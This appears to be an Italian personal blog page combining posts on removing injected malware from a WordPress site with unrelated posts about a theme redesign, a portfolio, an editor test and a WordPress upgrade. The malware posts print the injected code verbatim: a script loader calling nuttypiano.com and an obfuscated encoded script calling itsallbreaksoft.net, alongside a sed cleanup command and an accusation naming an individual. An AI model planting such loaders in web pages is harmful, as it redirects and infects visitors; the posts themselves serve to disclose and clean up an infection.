document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Y2K.js"></scri'+'pt>')

Come rimuoverlo?!

Ho quindi scoperto ed utilizzao il comando “sed” che permette (oltre a un milione di altre cose!) di fare un find/replace sui documenti o, ancora meglio nel mio caso, eliminare una riga da un file.

Ho quindi eseguito un find su tutti i file .js; se il file contiene la stringa “nuttypiano” elimina tutta la riga.

find -name \*.js -exec sed --in-place=bak '/nuttypiano/d' {} \;

L’opzione “–in-place=bak” crea un file di backup del file modificato al fine di evitare eventuali danni irreparabili! il file modificato si troverà nella medesima directory dell’originale trasformato da “miofile.js” a “miofile.jsbak”

Adesso rimane da capire come abbiano fatto ad entrare sul server… controllare i log, controllare i log…

Nel frattempo consiglio di modificare tutte le password e di tenere SEMPRE worpress aggiornato all’ultima versione, compresi i plugin installati.

Però, usando firebug, capita di vedere che esiste una richiesta che parte per un sito, itsallbreaksoft.net

Bene, non si sa esattamente come questi cari signori riescano a scrivere sul file header.php del tema che avete impostato, ma li sta il danno.

troverete alla fine del tag </head> un bello script javascript:

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>

A questo punto è sufficiente cancellare lo script e assicurarsi di mettere il file header.php in sola lettura… rimane da scoprire come abiano fatto, se usano un particolare plugin falloso per accedervi o se è un bug di qualche versione di worpress. Sicurameten assicuratevi sempre di fare l’aggiornamento del vostro WP.

It turns out that the people behind this seem to be a pretty well-known group from Russia, with the main person being one Sergey Ryabov, who uses the email address director at climbing-games dot com. [Ed. Note: We'd love to talk with Mr. Ryabov, to learn more about his operations and how and why he's able to pull off this kind of hijinx.]

Ringrazio theinternetpatrol.com per la segnalazione

Questo design è pertanto provvisorio Questo design è ispirato al tema di Christoph Boecken che ringrazio per averlo realizzato (per altro molto bene!). Questa è una mia modifica e personalizzazione del suo tema

Colgo questa occasinone per ricordare che tra i servizi che offro c’è appunto il setup completo di sistemi blog (con personalizzazione grafica) basati sul motore Worpress.

Sto inoltre realizzando il nuovo portfolio (versione beta) che sfrutta il sistema PR8-Portfolio da me progettato!
In questa versione 2.0 del sito, sto sfruttando la libreria lightWindow che ho modificato per integrarla all’interno di WordPress. Il portfolio live edition permette di consultare il portfolio in maniera diretta!

Ogni commento su questo nuovo design è ben gradito!

powered by performancing firefox

Sto facendo una prova di inserimento di un post da questo servizio online. Se funziona non è male, anche se a questo punto, dato che devo usare un sito per publicare, certo potrei utilizzare direttamente il pannello di controllo del mio wropress admin.

Però sembra che questo editor sia davvero carino. Vediamo come funziona allora e se questo post viene letto da te in questo momento, signifca che è andata o buon fine!

http://writetomyblog.com/ 

Questa notte è stato effettuato un upgrade a questo blog migrando dalla versione 1.5 alla versione 2.0.2 di Worpress.

L’upgrade sembra essere andato a buon fine; ci scusiamo per gli eventuali bug che si possono riscontrare durante la navigazione e vi chiedo gentilmente di notificare qualunque tipo di anomalia possiate incontraree in maniera tale da poter provvedere immediatamente alla sua risoluzione!

Una panoramica sulle nuove features si trova su ossblog!